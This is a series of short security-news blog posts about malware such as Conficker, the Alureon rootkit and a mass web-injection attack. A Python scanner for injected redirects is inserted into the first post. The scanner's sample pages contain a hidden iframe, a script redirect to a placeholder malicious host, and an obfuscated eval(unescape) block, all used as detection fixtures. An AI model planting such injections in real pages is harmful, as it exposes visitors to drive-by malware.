16
Jun
Categories Warning, Virus.

Link: http://www.itworld.com/internet/110593/mass-web-attack-hits-wall-street-journal-jerusalem-post?source=itw_rss

Looks like system repairers will be busy again this week....

Cisco Systems' Web-tracking subsidiary, ScanSafe, started following the incident two days ago, said Mary Landesman, a senior security researcher with Cisco. Somehow, the hackers have posted malicious HTML code on the affected Web sites that redirects victims to a malicious Web server. This server tries to install software on Web visitors' computers. If it's successful, the software gives the criminals a way to remotely control their victims' PCs.

Big sites like the Wall St. Journal and Jerusalem Post have been associated. Read the article and scan your rig.

- by Rob
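The attack described above works by adding a hidden iframe, script or redirect to an otherwise legitimate page. As an added example (not code from the article, ScanSafe or this blog), here is a small Python check that pulls every element capable of sending a visitor elsewhere out of a page and flags any whose host is neither the site itself nor an expected CDN. The sample pages and the `.test` hostnames are constructed for the example; the obfuscation heuristic (an `eval`/`unescape` call over a long run of `%xx` escapes) is an assumption about one common injection style, not something the article states.

```python
"""Flag injected off-site redirects in HTML.

Added example, not code from the page. Sample pages below are constructed;
hostnames under .test are placeholders, not real attack infrastructure.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _RedirectCollector(HTMLParser):
    """Collect every place a page can send the visitor somewhere else."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (kind, target)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser lower-cases attribute names for us
        if tag in ("script", "iframe", "frame", "embed", "object") and a.get("src"):
            self.findings.append((tag, a["src"]))
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content") or "", re.I)
            if m:
                self.findings.append(("meta-refresh", m.group(1)))

    def handle_data(self, data):
        # Inline script bodies arrive here as CDATA; look for location rewrites
        # and for the eval(unescape("%3C...")) dropper pattern (assumed heuristic).
        for m in re.finditer(
            r"(?:window\.|document\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", data
        ):
            self.findings.append(("inline-location", m.group(1)))
        if re.search(r"\b(?:eval|unescape)\s*\(", data) and \
                len(re.findall(r"%[0-9A-Fa-f]{2}", data)) > 20:
            self.findings.append(("obfuscated-script", data.strip()[:60]))


def off_site_redirects(html, site_host, allowed_hosts=()):
    """Return (kind, target, host) for redirect sources that leave the site.

    Relative URLs (no host) are treated as same-site; hosts in allowed_hosts
    (e.g. the site's own CDN) are ignored. Obfuscated script blocks are always
    reported, with an empty host, because their target cannot be read statically.
    """
    p = _RedirectCollector()
    p.feed(html)
    ok = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    flagged = []
    for kind, target in p.findings:
        if kind == "obfuscated-script":
            flagged.append((kind, target, ""))
            continue
        host = urlparse(target.strip()).netloc.lower().split(":")[0]
        if host and host not in ok:
            flagged.append((kind, target, host))
    return flagged


# Constructed sample pages for the example.
SAMPLE_CLEAN = """<html><head>
<script src="/js/site.js"></script>
<script src="//cdn.example-news.test/lib.js"></script>
</head><body>
<iframe src="/ads/frame.html"></iframe>
<a href="http://other.test/">link</a>
</body></html>"""

SAMPLE_INJECTED = SAMPLE_CLEAN.replace(
    "</body>",
    '<iframe src="http://malicious-redirector.test/in.cgi?3" width="0" height="0"></iframe>\n'
    '<script>window.location.href="http://malicious-redirector.test/go";</script>\n'
    "</body>",
)

SAMPLE_OBFUSCATED = SAMPLE_CLEAN.replace(
    "</body>",
    '<script>eval(unescape("' + "%3C%69%66%72%61%6D%65%20" * 4 + '"))</script></body>',
)

if __name__ == "__main__":
    for name, page in (("clean", SAMPLE_CLEAN), ("injected", SAMPLE_INJECTED),
                       ("obfuscated", SAMPLE_OBFUSCATED)):
        hits = off_site_redirects(page, "www.example-news.test", ["cdn.example-news.test"])
        print(name, "->", hits or "no off-site redirects")
```

Run it against a saved copy of a page rather than the live site, and expect to tune `allowed_hosts` per site: ad networks and analytics loaders will show up as off-site scripts, and deciding which of those belong there is exactly the judgement call the scanner cannot make for you. Plain-text matching also misses redirects assembled at runtime, so a clean result is evidence, not proof.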

25
May
Categories Virus.

Link: http://www.computerworld.com/s/article/9177223/Microsoft_smacks_patch_blocking_rootkit_second_time?source=rss_news

Gods, this was the nasty beast I was battling last week - it's a mutant, as it installs into the Windows drivers (in my case the CD driver), hides its files on a hidden partition, and reinstalls malware at every boot. I actually gave up and formatted the machine.

Microsoft has released a new tool that cleans the infection - then you can run Malwarebytes to clean up the leftovers. (Malwarebytes can't remove this one on its own.)

According to the Microsoft Malware Prevention Center (MMPC), this month's Malicious Software Removal Tool (MSRT) has scrubbed the Alureon rootkit from over 360,000 Windows PCs since its May 11 release. That represented 18.2% of all MSRT detections for the month, more than double the 8.3% the rootkit accounted for in April.

The free MSRT is updated each month as part of Microsoft's monthly Patch Tuesday, and pushed to users via the same Windows Update mechanism used to serve up security fixes.

- by Rob

22
Apr

Link: http://tips.vlaurie.com/2010/04/symantec-internet-security-threat-report/

Taking a look at the top offenders - one program really stands out. Internet Explorer. I see examples of this in the wild all the time. Yeah, Adobe is up there too - so keep your Acrobat and Flash updated and use Chrome or Firefox or Opera. Just doing those three simple things can keep you from having to go to Geek Squad - or at worst getting your machine rebuilt from scratch.

Oh by the way - there's a new IE8 flaw that puts users at risk... go figure.

- by Rob

10
Jul
Categories Virus.

Link: http://it.slashdot.org/story/09/07/10/0452256/Korean-DDoS-Bots-To-Self-Destruct

Oh boy,

Several news sources are reporting that the tens of thousands of Microsoft Windows systems infected with the Mydoom worm and being used in an ongoing denial of service attack against US and S. Korean government Web sites will likely have their hard drives wiped of data come Friday.

Well, one good thing - all those infected machines will be really really easy to identify ...

Get your Windows CD ready for reinstall.....

- by Rob

12
Jun
Categories Software, Virus.

Link: http://www.appleinsider.com/articles/09/06/11/microsoft_announces_free_anti_virus_service_for_windows.html

You're gonna love this - what's worse than Windows Defender? No, sadly it's not a joke. I mean I've seen countless malware apps slip right past that wonder of a useless software package... not to mention the hassle of installing it... oh sure - please verify your Windows copy is legit 14 times and all..

No, this new offering is cloud based - so all your traffic goes through Microsoft's servers to be sterilized.

Aha, I'm sure no bad will come of that. - What's the data retention policy? Will that search for Win XP key codes go through? I figure no serious user will have anything to do with this one.

The other question is - will it be a good tool to protect the clueless noobs? IMHO not if it's anywhere near as lax as Defender.

|-|

- by Rob

29
Apr
Categories Virus.

Link: http://news.zdnet.com/2100-9595_22-292858.html

You do remember the Conficker virus right? Well, it hasn't gone away. All those folks that have infected systems are now sending spam out unknowingly.

According to a report by Xinhua News Agency, Conficker-infected machines are now being turned into servers for e-mail spam. Quoting Vincent Weafer, vice president of Symantec Security Response, Xinhua reported Conficker now installs a second virus--Waledac--that sends out e-mail spam without the computer owner's knowledge.

I figure we will all start seeing an increase on the already overwhelming volume of spam. 8|

- by Rob

15
Apr
Categories Virus.

Link: http://news.cnet.com/8301-1009_3-10218363-83.html

Security experts say be careful who you follow on Twitter, after worm attacks leave some users with infected profiles - the worm infected "tens of thousands of users".

Yep, here we go again - all so you can find out that Joe Schmo is still having regular bowel movements and all.....

- by Rob

13
Apr
Categories Virus.

Link: http://news.cnet.com/8301-1009_3-10217386-83.html

Ok, the plot thins... so far Conficker's turned out to be a very elaborate scheme to make money....

If your PC has Spyware Protect 2009 and is displaying warning messages saying that the computer is infected and offering to clean it up for $49.95...

You've been had once - if you go and spend for this crapware you'll have been had twice ...

Though I have nothing against you if you call me to fix your problems, as long as you have a few hundred.95

:1:

- by Rob

9
Apr
Categories Warning, Virus.

The nefarious Conficker worm just woke up and started downloading - firstly, the Conficker variant got updated and got some new functions.

This from SANS

Various sources report that some Conficker infected systems are receiving updates now. The update may include a keylogger and other code to exfiltrate data. We will keep this diary updated as we hear more. The update is delivered using the P2P mechanism.

Word on the street is that the new payload it's taking after that is a rootkit - which makes perfect sense - you can clean up the Conficker worm... cleaning the rootkit is an entirely different matter.

If it is a rootkit, Conficker will be doing what most of us thought it would all along - harvest bank accounts, credit cards, personal data - someone stands to make a lot of money off of it, whether they sell the data or use it themselves.

If you still are unsure if you are infected there is a simple test.

If you fail this test you could try one of the many removal tools.

But be aware - if you aren't sure what you're doing or aren't particularly technically savvy.... get you a tech.

- by Rob